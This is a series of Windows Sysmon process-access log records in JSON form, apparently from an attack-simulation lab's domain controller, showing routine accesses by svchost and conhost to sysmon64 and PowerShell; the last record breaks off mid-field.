{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5156,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5157,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5158,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5159,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5160,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5161,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5162,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5163,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.359\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.359","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","TargetProcessId":"3064","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5164,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.390\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nTargetProcessId: 3064\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 